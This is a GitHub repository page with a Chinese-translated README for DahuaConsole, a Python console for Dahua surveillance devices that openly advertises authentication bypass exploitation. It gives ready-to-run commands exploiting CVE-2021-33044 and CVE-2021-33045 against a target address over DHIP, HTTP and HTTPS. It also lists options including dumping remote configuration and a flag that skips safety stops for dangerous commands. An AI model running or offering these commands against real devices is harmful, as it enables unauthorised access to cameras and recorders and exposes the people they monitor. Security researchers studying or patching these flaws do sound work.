mcw0/DahuaConsole

GitHub: mcw0/DahuaConsole

大华监控设备专用调试控制台工具，支持多协议访问和认证绕过漏洞利用。

Stars: 303 | Forks: 80

# Dahua 控制台 - 版本：Pre-alpha - Bug：确实存在 - 待办：很多事情 [安装依赖] ``` sudo pip3 install -r requirements.txt ``` [参数] ``` -h, --help show this help message and exit --rhost RHOST Remote Target Address (IP/FQDN) --rport RPORT Remote Target Port --proto {dhip,dvrip,3des,http,https} Protocol [Default: dvrip] --relay RELAY ssh://:@: --auth AUTH Credentials (username:password) [Default: None] --ssl Use SSL for remote connection -d, --debug JSON traffic -dd, --ddebug hexdump traffic --dump {config,service,device,discover,log,test} Dump remote config --dump_argv DUMP_ARGV ARGV to --dump --test test w/o login attempt --multihost Connect hosts from "dhConsole.json" --save Save host hash to "dhConsole.json" --events Subscribe to events [Default: False] --discover {dhip,dvrip} Discover local devices --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui} Logon types -f, --force Bypass stops for dangerous commands --calls Debug internal calls ``` [发布] [更新] 2022-07-10 - 为运行 2016 年 V2 软件的 VTH1510CH 添加了 3des_old 登录方法 - 登录数据包数据中的细微差异 - 连接时不查询设备参数 - 会重置连接 - 添加了 `--restore config-file.json` - 加载 json 配置文件或其部分内容。示例： `./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config` [更新] 2021-10-07 详情请见：https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt 2021-10-06 [CVE-2021-33044] 所需协议：DHIP 或 HTTP/HTTPS (DHIP 不适用于 TLS/SSL @TCP/443) ``` [proto: dhip, normally using tcp/5000] ./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000 [proto: dhip, usually working with HTTP port as well] ./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80 [proto: http/https] ./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80 ./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443 ``` [CVE-2021-33045] 所需协议：DHIP (DHIP 不适用于 TLS/SSL @TCP/443) ``` [proto: dhip, normally using tcp/5000] ./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000 [proto: dhip, usually working with HTTP port as well] ./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80 ```

标签：CISA项目, CVE-2021-33044, Dahua, DHIP, DNS枚举, DVRIP, HTTP工具, IoT安全, PoC, Python, 协议分析, 固件调试, 大华, 嵌入式设备, 插件系统, 摄像头漏洞, 无后门, 暴力破解, 权限提升, 物联网, 网络安全工具, 调试控制台, 身份验证绕过, 配置导出, 默认口令